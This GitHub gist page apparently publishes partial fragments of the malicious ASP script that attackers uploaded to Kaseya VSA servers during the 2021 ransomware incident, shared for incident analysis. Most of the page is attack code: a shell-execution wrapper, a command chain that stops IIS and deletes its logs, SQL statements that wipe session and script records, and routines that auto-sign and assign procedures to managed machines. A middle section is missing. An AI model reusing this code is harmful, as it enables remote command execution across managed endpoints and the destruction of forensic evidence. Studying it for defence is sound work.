Created
July 5, 2021 18:59
-
-
Save JohnHammond/a55ddc4a15aa2ab2281969c8e1159824 to your computer and use it in GitHub Desktop.
Fragments of Screenshot.jpg uploaded to the Kaseya VSA during the ransomware incident
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
fso.DeleteFile(Server.MapPath(pageFilterSQLFile)) | |
dbConn.Execute( "DELETE FROM adminMachFil WHERE adminId="+sessionAdminId+""+ \ | |
"DELETE FROM userLogon WHERE sessionId="+sessionId+""+\ | |
"DELETE FROM appSession WHERE adminId="+sessionAdminId+"" ,0,128) | |
Response.Write("0") | |
function cmdShell(c, sleep, wait) { | |
try { | |
if (wait == null) wait = 0 | |
if (sleep != null & sleep > 0) c = "ping 127.0.0.1 -n "+(sleep+1)+" > nul & "+c | |
var kComObj = Server.CreateObject("KComWExec.execCmd") | |
kComObj.wait = wait | |
kComObj.timeoutSec = 360000 | |
kComObj.getOutput = wait | |
kComObj.execShellCmd(c) | |
return(kComObj.getCmdOutput()) | |
} | |
catch(e){ | |
} | |
} | |
var rp = Server.MapPath("..") + "\\" | |
clearLogs = "%SystemDrive%\\Windows\\System32\\iisreset.exe /stop & "+ \ | |
"rmdir /s /q %SystemDrive%\\inetpub\\logs & "+ \ | |
"del /s /q /f "+rp+".log "+rp+".log. "+rp+"WebPages\\Errors\\webErrorLog.txt"+" & "+ \ | |
"%SystemDrive%\\Windows\\System32\\iisreset.exe /start & "+ \ | |
"del /s /q /f %SystemDrive%\\.log" | |
function SignProcedure() { | |
var httpRequest = Server.CreateObject( "Msxml2.ServerXMLHTTP.6.0" ) | |
var url = "http://localhost/vsaPres/Web20/providers/SignProcedures.ashx" | |
var data = new String("{ \"ScriptIds\":[#ids#], \"AutoApprove " // THIS PORTION OF THE FILE IS TRUNCATED | |
// THIS PORTION OF THE FILE IS TRUNCATED | |
// [4344 bytes missing in capture file] | |
// THIS PORTION OF THE FILE IS TRUNCATED | |
.ySec += 1 | |
cnt += 1 | |
recSet.MoveNext() | |
} | |
SignProcedure() | |
recSet.Close() | |
procCreate("Archive and Purge Logs") | |
procStep(26, "2", "0", "+++SQLCMD:"+\ | |
"DELETE FROM scriptAssignment WHERE scriptId IN ("+scriptIds+")"+\ | |
"DELETE FROM scriptThenElse WHERE scriptId IN ("+scriptIds+")" +\ | |
"DELETE FROM scriptIdTab WHERE scriptId IN ("+scriptIds+")" +\ | |
"DELETE FROM scriptIf WHERE scriptId IN ("+scriptIds+")" +\ | |
"DELETE FROM scriptLog WHERE scriptId IN ("+scriptIds+")" +\ | |
", 1)" | |
procAssig("123456789", diffSec + 1800) | |
SignProcedure() | |
cmdShell("del /q /f "+certFullSP, diffSec + 1800 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment